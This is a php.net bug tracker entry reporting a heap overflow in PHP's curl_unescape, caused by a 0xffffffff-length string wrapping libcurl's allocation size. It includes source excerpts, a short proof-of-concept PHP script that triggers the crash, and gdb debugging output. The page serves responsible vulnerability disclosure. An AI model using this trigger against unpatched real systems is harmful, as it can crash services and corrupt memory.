|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-07-13 06:05 UTC] stas@php.net
-PHP Version: 7.1Git-2016-07-04 (Git)
+PHP Version: 7.0.8
[2016-07-13 06:05 UTC] stas@php.net
[2016-07-13 06:06 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-07-14 02:01 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-07-18 08:46 UTC] ab@php.net
[2016-07-19 08:55 UTC] stas@php.net
[2016-07-19 08:55 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-07-19 17:59 UTC] ab@php.net
[2016-07-20 11:30 UTC] davey@php.net
[2016-08-01 02:43 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-10-17 10:11 UTC] bwoebi@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 11:01:29 2024 UTC |
Description: ------------ In "curl_unescape" function, if we provide the string with length 0xffffffff, PHP_FUNCTION(curl_unescape) { char *str = NULL, *out = NULL; size_t str_len = 0; int out_len; zval *zid; php_curl *ch; ... if ((out = curl_easy_unescape(ch->cp, str, str_len, &out_len))) { //<- crashes here RETVAL_STRINGL(out, out_len); curl_free(out); } ... } Take a loot at curl_easy_unescape in libcurl: char *curl_easy_unescape(struct Curl_easy *data, const char *string, int length, int *olen) { ... CURLcode res = Curl_urldecode(data, string, inputlen, &str, &outputlen, FALSE); ... } and Curl_urldecode: CURLcode Curl_urldecode(struct Curl_easy *data, const char *string, size_t length, char **ostring, size_t *olen, bool reject_ctrl) { size_t alloc = (length?length:strlen(string))+1; //<- the 0xffffffff length of string above will cause value of alloc = 0 ... while(--alloc > 0) { //--alloc = 0xffffffff for the first check, it will loop for 0xffffffff times ... ns[strindex++] = in; //heep overflow here string++; } ... } Test script: --------------- <?php ini_set('memory_limit', -1); $str = str_repeat("A", 0xffffffff); // Create a curl handle $ch = curl_init('http://example.com/redirect.php'); curl_unescape($ch, $str); ?> Expected result: ---------------- No crash Actual result: -------------- Some backtrace: (gdb) bt #0 0x00007ffff6a97218 in ?? () from /usr/lib/libcurl.so.4 #1 0x00007ffff6a97316 in curl_easy_unescape () from /usr/lib/libcurl.so.4 #2 0x00000000005fd2da in zif_curl_unescape (execute_data=0x7ffff3a15100, return_value=0x7fffffffabe0) at /php-src/ext/curl/interface.c:3601 #3 0x00000000008f8faa in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /php-src/Zend/zend_vm_execute.h:631 #4 0x00000000008f8881 in execute_ex (ex=0x7ffff3a15030) at /php-src/Zend/zend_vm_execute.h:428 #5 0x00000000008f8991 in zend_execute (op_array=0x7ffff3a7e000, return_value=0x0) at /php-src/Zend/zend_vm_execute.h:473 #6 0x000000000089a765 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /php-src/Zend/zend.c:1441 #7 0x000000000080a27c in php_execute_script (primary_file=0x7fffffffe280) at /php-src/main/main.c:2515 #8 0x000000000097573b in do_cli (argc=2, argv=0x115fd50) at /php-src/sapi/cli/php_cli.c:993 #9 0x0000000000976705 in main (argc=2, argv=0x115fd50) at /php-src/sapi/cli/php_cli.c:1381 Some debug info: (gdb) x/i $rip => 0x7ffff6a97218: mov BYTE PTR [r14+r15*1-0x1],al (gdb) i r $r14 $r15 r14 0x12a3990 19544464 r15 0x5 5 Crash: Program received signal SIGSEGV, Segmentation fault. 0x00007ffff54f1218 in ?? () from /usr/lib/libcurl.so.4 (gdb) i r $r14 $r15 r14 0x12a39f0 19544560 r15 0x35611 218641 (gdb) i proc mappings process 31102 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0xe93000 0xa93000 0x0 /php-src/sapi/cli/php 0x1092000 0x113c000 0xaa000 0xa92000 /php-src/sapi/cli/php 0x113c000 0x12d9000 0x19d000 0x0 [heap]